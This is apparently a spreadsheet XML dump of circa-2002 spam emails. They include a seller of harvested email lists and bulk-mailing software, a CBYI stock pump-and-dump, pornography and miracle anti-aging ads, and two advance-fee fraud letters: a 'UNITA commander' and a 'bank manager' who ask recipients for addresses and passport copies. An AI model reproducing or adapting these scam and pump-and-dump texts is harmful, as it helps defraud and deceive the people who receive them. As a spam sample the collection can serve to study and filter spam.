theÂ customer whoÂ are interested in them,Â itÂ will bring
to you muchÂ  more businessÂ chanceÂ   
 and success.
XinLan Internet Marketing Center , has many years of experience in
developingÂ    
&amp;Â  utilizingÂ                      
internet resources.We have set up global business email address databases,
whichÂ                             
contain                           
millionsÂ  ofÂ Â  emailÂ  addresses ofÂ 
commercialÂ                             
enterprises andÂ  consumersÂ all over the world.Â         
These email addresses are sorted by countries and fields.Â By
usingÂ  advancedÂ                           
professional                          
technology, we also continuously update our databases,add
newÂ addresses ,Â                             
remove undel-                           
iverables and unsubscribeÂ addresses.With  the cooperation with our
partners,                       
We are able to                       
supplyÂ  valid targeted emailÂ  addressesÂ  accordingÂ 
toÂ                        
yourÂ  requirements ( for example,Â  youÂ                 
 needÂ some email                            
addresses of Importers in the field of auto spare parts in
England).WithÂ ourÂ                       
supplied email addresses,you                         
can easily and directly contact your potential customers.
We also supplyÂ  aÂ  wide varietyÂ  of software.Â     
For example ,Â Wcast,Â  the software forÂ  fast-sending
emails:Â               
this software                                                 
will enableÂ you toÂ                                          
 sendÂ  emailsÂ  atÂ  the rate ofÂ  over 10,000Â 
pcsÂ                                   
per hour,Â and to releaseÂ  informationÂ  toÂ         
 thousands of people in a shortÂ  time.
We are pleased to tell you that we are now offering our best prices
:Â Â Â Â Â Â Â Â Â            
        EmailsÂ  orÂ  SoftwareÂ Â Â Â Â Â Â Â Â Â Â Â 
Â Â Â Â Â Â Â Â Â Â Â Â 
Â Â Â Â Â Â Â Â                           
        Â Â  Remarks
Â Â Â                                         
        Price
Â 50,000
targeted                                       
        email addressesÂ We are ableÂ toÂ supplyÂ               
        validÂ  targetedÂ  emailÂ addresses according to your 
        requirements , whichÂ are all compiledÂ  upon
yourÂ order,suchÂ as                                     
        region / country / occupationÂ / fieldÂ / Domain Name
(like                                  
        AOL.com or MSN.com) etc.
Â                  
        USD 30.00Â 
Â Â Â Â          
        Classified email addresses
        Our database contains more than 1600 sort of email addresses,and
can         
        meet with your different demands.                             
        Â 
Â Â 
Â Â Â  8  
        million email addresses
        8 million global commercial enterprises email addresses       
        Â 
Â USD                                                  
        240.00Â 
Â Â Â Â Â Â Â                
        Wcast softwareÂ 
        Software for fast-sending emailsÂ                         
        Â 
Â                  
        USD 39.00Â 
Â Â Â Â Â Â                          
        Email searcher softwareÂ 
        Software for searching targeted email addressesÂ                  
        USD 68.00Â 
Â Â Â Â Â Â Â    
Global Trade                   
        Poster
        Spread info about your business and your products over 1500 trade 
        message boards and newgroups.Â Â                  
        Â 
Â USD               
        135.00Â 
Â Â Â Â Â Â                          
        Jet-Hits Plus 2000 ProÂ 
        Software for submitting website to 8000+Â  search
enginesÂ                                                  
        Â 
Â                  
        USD 79.00Â                                                
You may directly order the emails orÂ  softwaresÂ  from our       
website.Â For more details,
pleaseÂ               
 refer to our website.
It is our honour if you are interested in our services or softwares.Â 
Please do not hesitate to                            
contact us if any queries or concerns.Â We are glad toÂ serve
you.                                                  
Best regards!
Â Â Â Â Â Â Â Â Â Â Â Â 
Â Â Â Â Â Â Â K. Peng      
Marketing Manager
XinLancenter@163.com
Http://XinLan.24cc.com      
XinLan Internet Marketing Center
</t>
  </si>
  <si>
    <t xml:space="preserve">
A:link {
    TEXT-DECORATION: none
}
A:active {
    TEXT-DECORATION: none
}
A:visited {
    TEXT-DECORATION: none
}
A:hover {
    COLOR: #0033ff; TEXT-DECORATION: underline
}
For 
      Immediate Release
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$.30Â¢ 
      and should skyrocket to $2.66 - $3.25 a share in the near future. Â  
      Put CBYI on your watch list, acquire a postion
TODAY. 
REASONS TO INVEST IN CBYI
A profitable company, NO DEBT and is on track to beat ALL earnings 
      estimates with increased revenue of 50% annually!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 
RAPIDLY GROWING INDUSTRYÂ  
      Industry revenues exceed $900 million, estimates indicate that there 
      could be as much as $25 billion from "smell technology" by the end of 
      2003.
!!!! CONGRATULATIONS 
      !!!!!ToÂ our subscribers that took advantage of 
      ourÂ last recommendation to buyÂ NXLC.Â  It rallied from $7.87 
      toÂ $11.73!Â Â 
ALL removes HONERED. Please allow 7 
      days to be removed and send ALL address to: honey9531@mail.net.cnÂ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t>
  </si>
  <si>
    <t xml:space="preserve">Vigoral Ad
Vigoral Herbal Sex EnhancersDirect from
        the lab to you!We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
</t>
  </si>
  <si>
    <t xml:space="preserve">
Alarms, New Hours .htm
&lt;!--
 /* Style Definitions */
p.MsoNormal, li.MsoNormal, div.MsoNormal
	{mso-style-parent:"";
	margin:0in;
	margin-bottom:.0001pt;
	mso-pagination:widow-orphan;
	font-size:12.0pt;
	font-family:"Times New Roman";
	mso-fareast-font-family:"Times New Roman";}
p
	{font-size:12.0pt;
	font-family:"Times New Roman";
	mso-fareast-font-family:"Times New Roman";}
@page Section1
	{size:8.5in 11.0in;
	margin:1.0in 1.25in 1.0in 1.25in;
	mso-header-margin:.5in;
	mso-footer-margin:.5in;
	mso-paper-source:0;}
div.Section1
	{page:Section1;}
--&gt;Â 
U.S. HOMEOWNERS
CALL TODAY TO QUALIFY FOR 
A FREE HOME SECURITY SYSTEM
1-800-775-0738
Â 
Â 
Â 
America's most trusted 
security system... 
The most 
comprehensive 
security package 
ever offered FREE!
Â 
Over 135,000 
Families made 
the right 
choice!
Â 
Â 
Â 
In these
  troubled times, your family's safety is more important than ever! Defend your family
  against the threat of home invasion and forced entry. Make sure you're
  prepared to get help in the event of an emergency. Take advantage of
  the following special offer.
For a limited time you
  can receive our home security system, THE
  most comprehensive home security package ever offered for FREE!Â  You must call the Toll Free number
  below to qualify for this Special Offer.
You
  don't have to be a victim!Â  Intelligent homeowners are
  awakening to one undeniable fact. Studies show burglars will commit crimes
  somewhere else when confronted with a monitored security system.Â Our
  home security system provides ultimate protection for your family and home,
  24-hours each and every day. The bad guys will have to go elsewhere to find
  their victim.
State-of-the-art
  wireless technology! Â Our security system is advanced
  wireless technology which enables a clean installation in approximately one hour.
  No holes to drill, no unsightly wires to run.
Replacement parts
  (probably never needed) are also free,
  with your Lifetime Guaranteed Parts
  Replacement Warranty for as long as your home is monitored by our
  authorized UL listed monitoring facility. That tells you the confidence we
  place in our product's quality.
We are
  absolutely confident our security system provides the
  necessary deterrence and detection your home needs. To prove it, The company will pay your insurance deductible (Up to
  $250.00) in the unlikely event you suffer a loss from an unwanted
  intrusion. You also may be eligible for up to
  20% in insurance premium discounts.
To
  see if you qualify for this exciting offer, simply phone the toll free number
  below, answer a few simple questions, andÂ possibly have your new home
  security system installed, in your home, within 48 hours.
Â 
Â 
Call NOW !!Â Â  
1-800-775-0738
Operators are on duty 10:00 AM to 10:00 PM
  EDT Monday-Friday,
10:00 AM to 2:00 PM EDT on Saturday
Â 
Â 
Â 
Â 
Your system will include the following:
* No Connection Fee * 10 Doors/Windows
  Protected * Lifetime Warranty * Wireless-no drilling,
  no mess *You own the System! *Pages you when the
  kids get Home *Rechargeable Battery Backup * Yard Signs and Window
  Decals
Remember,Â 
  the system is Free and could save you as much as 20% on your Homeowners
  Insurance.Â  This is a limited time offer, so call now to
  qualify for your FREE HOME SECURITY SYSTEM.
Call Today! 
10:00 AM to 10:00 PM
  EDT Monday-Friday,
10:00 AM to 2:00 PM EDT on Saturday
Â 
1-800-775-0738
To be removed from future mailings,
  click 'Reply', typeÂ 'Remove' as your subject, and send.Â Â 
Â </t>
  </si>
  <si>
    <t>Congratulations, 
You Won $30 FreeToday At The Internet's Best &amp; MostTrusted On-Line 
Casino!
To Collect Your 
$30 Cash Click Here!Â 
To Collect Your $30 Cash Click Here!
Â Â 
Â 
Â This message is sent in compliance of the new 
            e-mail bill:SECTION 301 Per Section 301, Paragraph (a)(2)(C) of 
            S. 1618,Further transmissions to you by the sender of this email 
            maybestopped at no cost to you by entering your email address 
            tothe form in this email and clicking submit to be 
            automatically   
                               removed. To be Removed from our 
            Opt-In mailing list. Please enter your email address in the provided 
            box below and click remove, thank you. 
Your 
                          E-mail Address Will Be Immediately Removed From All Mailing ListsÂ </t>
  </si>
  <si>
    <t xml:space="preserve">
HEY, I AM FORWARDING YOU THE AD THEY SENT ME.
I TRIED THE LEADS AND THINK WE SHOULD USE THEM FOR OUR TEAM.
WHAT DO YOU THINK?
THANKS,
JOHN
LEAD SALE EXTENDED YOU HAVE BEEN INVITED TO JOIN THE CO-OP
LEAD SALE EXTENDEDWe have recently put
        together a lead co-op specifically for your group.Â  We have been
        able to lock the price at as little as 50 cents per lead!!Â  Leads
        are normally $1-$3 per...
Â So....SIGN UP TODAY....GET OUR LEADS....AND GET TO WORK!!Here is what we have
        to offer you:
NETWORK MARKETER OR GIFTER CONTACTSAll Leads Guaranteed To Be Network Marketers / or
                    Gifters
Guaranteed To Be Current, Active and Experienced
Leads, Have Either Responded To A Internet Questionnaire, Or
                    Are Already On Our Contact List, Of Current, Active
                    Networkers, Open To Opportunity.
Leads Include:Â Â Â Â [At Least] Name, Phone, And EmailÂ 
***USE US AS A TOOL TO BUILD YOUR BUSINESS!!Â  REFER
  AS MANY PEOPLE AS YOU CAN.Â  EARN A TRUE RESIDUAL INCOME BY THE
  DUPLICATION OF YOUR TEAM, CAUSE REMEMBER......[Remember] Â 
        Your System Now
        Includes A Proven Lead System.Â  Â Â Â 
        [Remember]
_____________________________________________________________________Replacement Policy
        [Our Leads Are Guaranteed]
Any Unusable LeadÂ Â  Ie. Missing Info,
            Invalid Info, Any Just Real Negative Response Towards You On The
            Phone..... REPLACEDReplacement Leads Given
              -Â  No Questions Asked.Â  Just Let Us Know What You Need
              And We Will Get It Handled.
PLEASE COMPLETE THE FOLLOWING FORMÂ 
NAME
PHONEEMAILTIME
              TO CALLPST
MNT
CST
EST
OTHERCOMPANY
              YOU ARE WITH
HOW
              MANY DOWNLINE MEMBERS DO YOU HAVE THAT MAY ALSO NEED LEADS?        Â 
Â 
Â 
Â 
Â 
Â 
Â 
Â 
You have received this
  Message because of a past Client/Service Relationship we had with you. If this
  might be inaccurate, or you simply wish to be Removed from all future Notices,
  then CLICK
  HERE
Â </t>
  </si>
  <si>
    <t xml:space="preserve">Shop hundreds of
lenders......with just one click!
Â Â Â 
Â Step 1...Â 
Â Answer a few questions
Â Â Â Â Â Â Â 
Â Step 2...Â 
Â Lenders compete for your business
Â Â Â Â Â Â Â Â Â Â Â 
Â Step 3...Â 
Â See how much YOU can save!Â  Â 
Â 
Â 
Refinance NOW while
rates are still low. You could save Hundreds per month!!There is no obligation and this is a FREE quote!ï¿½
Debt Consolidation Â ï¿½ Home Improvement
ï¿½ Refinancing Â ï¿½ Second Mortgage
ï¿½ Equity Line of CreditÂ  
Click
Here For Short Application
Â 
to be removed from our subscriber list
click
here23
</t>
  </si>
  <si>
    <t>Creamfields
Saturday 24th August 2002 2pm-6am (licence granted)
Old Liverpool Airfield
Speke Road, LiverpoolCreamfields. It's What August Bank Holidays Are for.  Creamfields is the most intense, chilled out, full on, laid back experience you can cram into one day.  Creamfields is the only award-winning dance festival. It's the only festival to feature the best live acts on an outdoor stage, leaving the arenas to the DJs. Creamfields is the best of Cream, Bugged Out!, Global Underground, Subliminal, Passion, Pacha Futura, Frantic, Nukleuz, Bacardi B Bar and Sunday Best. It Just Gets Better.To help get the party started (right), Ticketmaster have negotiated an exclusive offer of ï¿½5.00 off the normal price of tickets making the tickets just ï¿½41.00 plus booking fee.Book here NOW. This offer is only available until 22 June*http://www.ticketmaster.co.uk/mkt_email/mktemail.asp?id=114The line-up includes:  FAITHLESS
UNDERWORLD
MIS-TEEQ DJ SHADOW
KOSHEEN LEMON JELLY STANTON WARRIORS BENT FC KAHUNA
LAYO AND BUSHWACKA (live) A MAN CALLED ADAM DIRTY VEGASPAUL OAKENFOLD, SASHA, DEEP DISH, PETE TONG, DAVE CLARKE, TIMO MAAS, 
DJ TIESTO, ERICK MORILLO, SEB FONTAINE, XPRESS 2,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purchased.To stay up to date with other new events on sale, sign up for Ticketmaster's weekly Ticket Alert email newsletter. http://www.ticketmaster.co.uk/ticket_alert/Please do not reply to this email, as you will not get a response. To remove yourself from this mailing list, please email here: mailto:unsubscribe@ticketmaster.co.uk and write "Unsubscribe" in the subject line. For all other enquiries, visit our help page: http://www.ticketmaster.co.uk/help/</t>
  </si>
  <si>
    <t>.BIZ and .INFO Available HereDear sir/madam,The Internet Corporation for Assigned Names and Numbers [ICANN] has recently approved the addition of new extensions to the internet domain space. The new domain names will offer much-needed competition in the domain market. Consumers will be able to choose from the following new extensions: .biz, .info, and .nameThe new top-level domain names are now available to the general public at the following address: http://www.interniconline.com. Priced at only $24.95, the best names are expected to be snapped up quickly so don't hesitate.Sincerely,Internic Online
http://www.interniconline.com1202FFdi8-041VvDy1060QrFx3-446RpPn3326ChFp2-625zbFt8017TPMl55</t>
  </si>
  <si>
    <t xml:space="preserve">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kinson@asiamagic.comNow I can offer those quotation to you: 
Sound Card:
CMedia  8738 PCI Sound Card                    USD 4.50
CMedia  8738 PCI Sound Card 5.1 channel        USD 6.50
Crystal 4281 PCI Sound Card                    USD 4.60
Crystal 4280 PCI Sound Card                    USD 4.60
Crystal 4620 PCI Sound Card                    USD 4.50
Crystal 4236 ISA Sound Card                    USD 4.00
ESS     1938 PCI Sound Card                    USD 4.90
ESS     1978 PCI Sound Card                    USD 4.60
ESS     1989 PCI Sound Card                    USD 5.40
ESS     1869 ISA Sound Card                    USD 3.60
Yamaha   715 ISA Sound Card                    USD 4.60
Yamaha   724 PCI Sound Card                    USD 5.40
Yamaha   734 PCI Sound Card                    USD 4.80
Yamaha   740 PCI Sound Card                    USD 5.80
Yamaha   744 PCI Sound Card                    USD 6.20 
VGA Card:
Nvidia Geforce4 Ti4200                                                    USD Coming
Nvidia Geforce4 Ti4400                                                    USD Coming
Nvidia Geforce4 Ti4600                                                    USD Coming
Nvidia Geforce2 MX460     64MB DDRAM w/TV/DVI,Bundled w/PowerDVD          USD 111.50
Nvidia Geforce2 MX460     64MB DDRAM w/TV,Bundled w/PowerDVD              USD 106.50
Nvidia Geforce2 MX440     64MB DDRAM w/TV,Bundled w/PowerDVD              USD  79.00
Nvidia Geforce2 MX420     64MB SDRAM w/TV,Bundled w/PowerDVD              USD  58.50
Nvidia Geforce2 Ti200    128MB DDRAM w/TV/DVI,Bundled w/PowerDVD          USD 104.50
Nvidia Geforce2 Ti200     64MB DDRAM w/TV/DVI,Bundled w/PowerDVD          USD  88.50
Nvidia Geforce2 Ti 2X/4X  64MB DDRAM                                      USD  65.50
Nvidia Geforce2 MX400     64MB DDRAM w/TV                                 USD  45.00
Nvidia Geforce2 MX400     64MB DDRAM                                      USD  40.00
Nvidia Geforce2 MX400     64MB SDRAM w/TV                                 USD  44.50
Nvidia Geforce2 MX400     64MB SDRAM                                      USD  39.50
Nvidia Geforce2 MX200     32MB DDRAM w/TV                                 USD  38.50
Nvidia Geforce2 MX200     32MB DDRAM                                      USD  33.50
Nvidia Geforce2 MX200     32MB SDRAM w/TV                                 USD  36.00
Nvidia Geforce2 MX200     32MB SDRAM                                      USD  31.00
Nvidia Geforce2 MX200     64MB SDRAM w/TV                                 USD  39.00
Nvidia Geforce2 MX200     64MB SDRAM                                      USD  34.00
Nvidia TNT M64 2X/4X      32MB SDRAM w/TV                                 USD  28.40
Nvidia TNT M64 2X/4X      32MB SDRAM                                      USD  23.40
Nvidia TNT                16MB SDRAM                                       USD   CALL
Nvidia TNT                 8MB SDRAM                                      USD   CALL
ATI LT Pro             8MB SDRAM w/TV                     USD   9.50
ATI IIC                8MB SDRAM                          USD   9.00
ATI Rage Pro Turbo     8MB SDRAM                          USD   9.00
ATI Rage 128 Pro      32MB SDRAM                          USD  24.00
ATI Rage 128 Pro      32MB SDRAM w/TV                     USD   CALL
ATI Radeon VE 2X/4X   32MB SDRAM                          USD  35.00
ATI Radeon VE         32MB SDRAM w/CRT                    USD   CALL
ATI Radeon VE         32MB SDRAM w/CRT+TV+CRT             USD  45.50
ATI Radeon VE         64MB SDRAM w/TV                     USD   CALL
ATI Radeon VE         64MB SDRAM w/TV/CRT                 USD   CALL
ATI Radeon VE         64MB DDRAM w/TV                     USD   CALL
ATI Radeon 7500LE     64MB DDRAM w/CRT+TV+CRT w/PowerDVD  USD  57.50
ATI Radeon 7500       64MB DDRAM w/TV/DVI                 USD   CALL
ATI Radeon 8500       64MB DDRAM w/CRT+TV+CRT w/PowerDVD  USD 135.50
S3 Savage4 397 4X     32MB SDRAM               USD 20.00
S3 Trio 3D 368 2X      8MB SDRAM               USD  Call
SIS 305               32MB SDRAM               USD 19.00
SIS 315E              32MB SDRAM               USD 21.50
SIS 6326               8MB SDRAM               USD 10.00
SIS 6326 PCI           8MB SDRAM               USD 10.50
Trident 9750           4MB SDRAM               USD  9.50
Trident 9750 PCI       4MB SDRAM               USD  9.50 
Network Product:
Intel(Ambient)PCI 56k Int. Fax Modem w/voice   USD  8.30
Motorola      PCI 56k Int. Fax Modem w/o voice USD  7.00
Rockwell      PCI 56k Int. Fax Modem w/voice   USD  8.00
Rockwell      PCI 56k Int. Fax Modem           USD  7.30
Realtek       PCI 10/100 8139C Lan Card        USD  3.95
Realtek       PCI 10/100 8139C Lan Card w/WOL  USD  4.00
Realtek        PCI 10/100 8139D Lan Card          USD  3.70
ESS 2838      PCI 56K Int. Fax Modem w/o voice USD  7.00
Lucent        PCI 56K Int. Fax Modem w/o voice USD  7.60
Controller Card:
PCI 4+1 Ports USB 2.0 Controller Card          USD 13.50
PCI 3+1 Ports Firewire 1394 Controller Card
    (No Cable)                                 USD 12.00
iLink Cable                                    USD  2.30
2-Port PCI USB Host Card                       USD  5.50 
Ulead Video Editor Ver 5.0                     USD  3.80
All subject final re-confirm. 
Total order value over USD 10,000. FOBHK
Below, FORHK.
Price based on Bulk packing, with Driver and Manuel.
Best regards
Kinson Wong
*********************************************
ASIA MAGIC (HK) LTD.
Unit 11, 7/F., Harry Industrial Bldg., 
49-51 Au Pui Wan Street,
Fotan, Shatin. N.T. Hong Kong.
Tel: 852-26982550
Fax: 852-26983186
Mobile: 96687523
E-mail: kinson@asiamagic.com
Website: www.asiamagic.com
*********************************************
</t>
  </si>
  <si>
    <t xml:space="preserve">Take Control Of Your Conference Calls
Crystal Clear  
      Conference CallsOnly 18 Cents Per Minute!
(Anytime/Anywhere)No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Field*Name*
Web 
            Address
Company 
            Name*            State*
Business 
            Phone*
Home 
            Phone
Email 
            Address*
Type of 
            BusinessÃ¿FFFFA9 1999-2002 CCFL  To be removed from our distribution lists, please  
      Click 
      here..
</t>
  </si>
  <si>
    <t>On January 1st 2002,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Dollar:http://www.new-opps4u.com/eurocurrencyexchange/In addition to our currency report, you can receive:*  FREE trading software for commodities and currencies
*  FREE online trading advice via email
*  FREE trading system for stock and commodity tradersFind out how the new Euro Dollar will affect you.  If
you are over age 18 and have some risk capital, it's
important that you find out how the Euro Dollar will
change the economic world. CLICK NOW!http://www.new-opps4u.com/eurocurrencyexchange/
$5,000 minimum investmentPlease carefully evaluate your financial position before
trading.  Only risk capital should be used.
http://www.new-opps4u.com/TakeMeOff/ To OptOut</t>
  </si>
  <si>
    <t xml:space="preserve">
Did you know 4 of the country's 10 richest people never graduated from college?They had the courage to dream, and the wisdom to
take advantage of opportunities.Do you have the Courage and the Wisdom to 
change YOUR life?YOU DESERVE SUCCESS!Checking out this web site is free, and it could pay off in the form of
a dramatically improved lifestyle for you and your loved ones.You will never know unless you check it out NOW!Invest JUST ONE minute to check out this website right now.http://www.22freewayexit2284.net/index7.htmlIf you would like to be removed from all future mailings just
send and email to erienw3943@freemail.hu</t>
  </si>
  <si>
    <t>Free Debt Consolidation Information
	Free 1 Minute Debt Consolidation Quote* Quickly and easily reduce Your Monthly Debt Payments Up To 60%We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Debt!If you have $4000 or more in debt, a trained professional will negotiate with your creditors to:
Lower your monthly debt payments up to 60%
	End creditor harassment
	Save thousands of dollars in interest and late charges
	Start improving your credit ratingOur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with the following for your Free Analysis
Name:
Address:
City:
State:
Zip:
Home Phone:(___) ___-____
Work Phone:(___) ___-____
Best Time:
Email:
Total Debt:
To end mail reply to this Email with the subject REMOVEfabcncnrroumzcsg</t>
  </si>
  <si>
    <t xml:space="preserve">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(1-877-451-8336)For phone billing:     1-900-993-2582
-- 
_______________________________________________
Sign-up for your own FREE Personalized E-mail at Mail.com
http://www.mail.com/?sr=signup</t>
  </si>
  <si>
    <t xml:space="preserve">
Accept Credit Cards - Everyone Approved
NO CREDIT CHECKSDO IT NOW
5226171310
</t>
  </si>
  <si>
    <t xml:space="preserve">Date:May 16,2002. 
Email:edum@hkem.com. Dear Sir, I am Mr.Eduado de Mello, one of the Principal 
Commanders of the Union for the Total Independence of 
Angola,UNITA.Well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Dr.Jonas Savimbi was killed in an 
encounter with the government forces of the MPLA 
government of my country.The rest is now history but 
suffice it to say that I am tired of the unfortunate 
role of waging a war against my fatherland.I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Dr.Jonas Savimbi.Indeed because I am a 
brother to one of his wives,he confided in me a great 
deal.The result of such trust is my reason for 
contacting you I was the commander whom he sent to 
deposit the sum of Thirty two million USD ($32million) 
with a security/finance company in South Africa.This 
was immediately after the events of September 11,2001 
in the United States of America.Indeed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security/finance company 
as cash in Hundred dollar denominations.The money is 
kept in my signature and would have been used in the 
purchase of arms and ammunition for the purposes of 
continuing the civil war in Angola.The supreme 
commander is dead and as already stated I have decided 
to quite the whole thing and this is without regard to 
the fact that other commanders may wish to continue ! 
I want to cooperate with you in my decision to inherit 
the $32million.I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20% 
of the $32million.Please come back to me through 
email: edum@hkem.com.The security/finance 
company is standing by to receive my instructions on 
this and I will link you up with them as soon as you 
are ready to take possession of the $32million. 
Finally you are to note that in you reply, you are to 
state your residential or company address and if 
possible send a copy of your international passport so 
as to assure me that my money is safe in your hands. 
Yours truly, 
Eduado de Mello _______________________________________________
dcms-dev mailing list
dcms-dev@eros.cs.jhu.edu
http://www.eros-os.org/mailman/listinfo/dcms-dev
</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</si>
  <si>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</si>
  <si>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
SHOCKING PAPARRAZZI NUDE CELEBRITY PICS &amp; VIDEOS!Naked Male and Female Stars caught on tape! Real
Photos and Footage of Celebrities caught Skinny
Dipping, Sun Bathing in the Nude, Cheating, Jerking
Each Other Off and Feeling Each Other Up in PUBLIC!The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http://www.celebritysnude.net/index.html?id=2010868Bonus Material:
Houston 620, Celebrity Fakes, Amateur Wannabes, Naked
Soap Stars, barely Legal Celebs, Before the Fame,
Celeb Date Contest + Much Much More......Enter Now:
http://www.celebritysnude.net/index.html?id=2010868Send a blank email here to be removed from database:
mailto:nude_celebs@excite.com?subject=remove
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi-tech industry leader in an emerging 90 billion dollar 
environmental marketplace seeks U.S. and Canadian 
Entrepreneurs for market expansion. We have an immediate 
need and are willing to train and develop aggressive 
individuals in local markets.  Candidates must be 
motivated individuals with the entrepreneurial drive to 
run their own independent business part-time, full-time 
or spare-time from home backed with full company support.        START MAKING MONEY FROM HOME with it now!!
----&gt;&gt;&gt;&gt;&gt;http://www.doubleplushosting.com/bizop2/&lt;&lt;&lt;----- Here are some highlights:Huge compensation benefits program offered:
* Uncapped commissions and bonuses.
* Qualified Mgrs. part-time avg. up to $6,293/mo. or more!
* Top Mgrs avg. over $200k/yr.Total Flexibility:
* No commuting necessary! Work from home environment.
* P/T or F/T positions available.
* Create your own schedule and hours.Company Support:
* Each independently run business is backed with full company support.
* Up to 99.0% start up funding available, if needed.Complete Training:
* Personal one-on-one training by top company leaders.
* Proven step-by-step marketing system.
* Product sells itself. (No selling or cold calling!).Perks:
* Luxury company car ($800/mo).
* National/International all expense paid vacations, business or pleasure.
* Profit sharing program.               START MAKING MONEY FROM HOME with it now!!
------&gt;&gt;&gt;&gt;&gt;http://www.doubleplushosting.com/bizop2/&lt;&lt;&lt;------To maintain regulatory compliance, we are unable to name our company in 
this ad. However, you will soon discover that our 15 year old privately 
held, hi-tech manufacturing company was recently recognized as the 82nd 
faster growing U.S. company by INC 500.  We help solve a common problem 
that up to 82% or more population suffers from and helps solve it quickly 
and easily in a 90 billion dollar untapped marketplace.Candidate profile:
* Strong work ethic required.
* Honesty and integrity expected.
* Management / leadership skills helpful, but not necessary.
* No sales experience expected or needed. (Product sells itself!)LOCAL POSITIONS ARE GOING FAST.  Interested parties should respond IMMEDIATELY!*************************************************************
To receive a FREE information pack including an audiocassette and 
corporate video on this amazing hi-tech product and how YOU CAN 
START MAKING MONEY FROM HOME with it now!!
------------&gt;&gt;&gt;&gt;&gt;http://www.doubleplushosting.com/bizop2/&lt;&lt;&lt;----------------------To Be ExCerted - mailto:abo9@eudoramail.com
</t>
  </si>
  <si>
    <t xml:space="preserve">
Â 
Dear 
              Homeowner,Â               *6.25% 
              30 Yr Fixed Rate MortgageInterest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POINTS              aNO 
              COST OUT OF POCKET              aNO 
              UPFRONT FEES              aNO 
              OBLIGATION               aFREE 
              CONSULTATION               aALL 
              CREDIT GRADES ACCEPTED 
6.25% won't stay this low forever!
              Click for your Free Quote, NOW!              Â H
Apply 
                now and one of our lending partners will get back to you within 
                48 hours.CLICK HERE!To Be Removed Please "Clicking 
Here" . </t>
  </si>
  <si>
    <t>FREIGHTMART Mail CampaignFREIGHTMART.COM - Ship Anything...Anywhere...Anytime...Auction Style!
Need More Info?Â |Â 
	If you're a ShipperÂ |Â 
	If you're a Forwarder
To be REMOVED from any future offers, simply CLICK HERE!</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Friend,
How would you like to make $50,000 in the next 90 days? Sounds impossible? 
I guarantee that it's true, and YOU can do it. I'm sure you would like an 
extra $50,000 to spend. For more information, please visit the website 
below.http://www.geocities.com/akcina/index.htmlIf the above link does not work, please copy the address and paste it into 
your web browser.AT THE VERY LEAST TAKE A MINUTE TO LOOK AT WHAT IS ON THE SITE, IT MAY 
CHANGE YOUR LIFE FOREVER.Note: This is not an unsolicited e-mail. By request,
your e-mail address has been verified by you to receive
opt-in e-mail promotions. If you do not wish to receive
these emails and want to unsubscribe yourself from the
terms of this verification, please reply to this email
with the word "remove" in the subject line, and you will
be removed from our mailing list.
</t>
  </si>
  <si>
    <t>Medial News -- Anti-Aging Breakthrough.
Thousands Grow Biologically Younger. Proven by Laboratory Test Results.As announced on NBC News, Dateline NBC, 20/20, Oprah and many other news programs and talk shows, you can help slow the aging process by using the correct anti-aging products.90-day, 100-percent, money-back guarantee.New scientific medical breakthroughs are helping millions worldwide to improve their health to better defend against the most devastating affects and diseases of aging. This news is important to every person over 40 and affects every family.Now that you have heard the NEWS, are you still skeptical? You probably are thinking, "There's no fountain of youth". What if you're wrong and you can slow the signs of aging? Wouldn't you like to know for sure?You can slow the signs of aging, just like the movie stars and the "rich and famous".
YES, YOU CAN HELP EXTEND THE PRIME OF LIFE.90-day, 100-percent, money-back guarantee.  MILLIONS OF CUSTOMERSOver 10 million of our supplements were consumed by our customers last year. That alone is proof that the products really work. We have thousands of testimonies from our customers stating how great the products work and how our customer's lives have changed because of them.You have seen the pain and anguish that your parents or grandparents suffered because of aging. Now, you don't have to suffer the same fate. You can slow the signs of again and help extend the prime of life. After 30 days, you can feel healthier... guaranteed.90-day, 100-percent, money-back guaranteeLIFE CHANGING BENEFITSWe have scientific evidence that proves you can slow the signs of again in the first 30 days, while feeling and seeing the following benefits: enhanced energy, strength and stamina; restored more youthful metabolism; lower levels of stress and body fat; support for your body's ability to restore, repair and rejuvenate; mental and physical performance support; improved outlook on life and much more.Click here and we will send you more info by e-mail.  mailto:agenomore301@netscape.net?subject=antiaging-info You can also prove that the products are working with a simple at-home laboratory test. The products are backed by a 90-day, 100-percent, money-back guarantee.We would like you to participate in our FREE EVALUATION PROGRAM. This is a one-time-only offer. We must hear from you within 7 days of this e-mail date. 90-day, 100-percent, money-back guarantee.Click here and we will send you more info by e-mail.  mailto:agenomore301@netscape.net?subject=antiaging-info Best Regards
Jim Alston
Anti-Aging Counselor ******************************************************************************** We apologize if you are not interested in learning more about how to grow younger, trim down and feel better. The Internet is the fastest method of distributing this type of timely information. If you wish to have your e-mail address deleted from our Better Health News e-mail database, DO NOT USE THE REPLY BUTTON. THE FROM ADDRESS DOES NOT GO TO OUR REMOVE DATABASE.Simply click here send an e-mail to: mailto:opt-out@soon.com?subject=remove</t>
  </si>
  <si>
    <t xml:space="preserve">
Thema Ordi
Tel:27 83 6919246
othema2002@37.com  
JOHANNESBURG, SOUTH 
AFRICA. 
ATTN: PRESIDENT/C.E.O. 
DEAR SIR, 
I AM MR. 
Thema Ordi, MANAGER OF BILLS/EXCHANGE AT THE FOREIGN REMITTANCE 
DEPARTMENT OF ABSA BANK LIMITED. IN MY DEPARTMENT, WE DISCOVERED AN 
ABANDONED SUM OF US$12.5,000,000 (Twelve POINT FIVE MILLION US 
DOLLARS ONLY) IN AN ACCOUNT THAT BELONGED TO ONE OF OUR FOREIGN CUSTOMERS WHO 
DIED ALONG WITH HIS ENTIRE FAMILY ON NOVEMBER 1994 IN A GHASTLY PLANE 
CRASH. SINCE WE GOT INFORMATION ABOUT HIS DEATH, WE HAVE BEEN EXPECTING 
HIS NEXT-OF-KIN TO COME OVER AND CLAIM HIS MONEY BECAUSE WE CANNOT 
RELEASE IT UNLESS SOMEBODY APPLIED FOR IT AS NEXT-OF-KIN,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NEXT-OF-KIN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2002. THE REASON FOR REQUESTING YOU TO PRESENT YOURSELF AS NEXT-OF-KIN 
IS OCCASIONED BY THE FACT THAT THE DECEASED (CUSTOMER) WAS A 
FOREIGNER. 
THE MODE OF SHARING AFTER A SUCCESSFUL TRANSFER OF THE MONEY INTO YOUR 
ACCOUNT: 60% TO MY COLLEAGUES AND I; FOR THE ROLE YOU WILL BE EXPECTED 
TO PLAY IN THIS DEAL, WE HAVE AGREED TO GIVE YOU THIRTY PERCENT (30%) 
OF THE TOTAL SUM, AND 10% FOR THE EXPENSES WE ARE GOING TO ENCOUNTER BY 
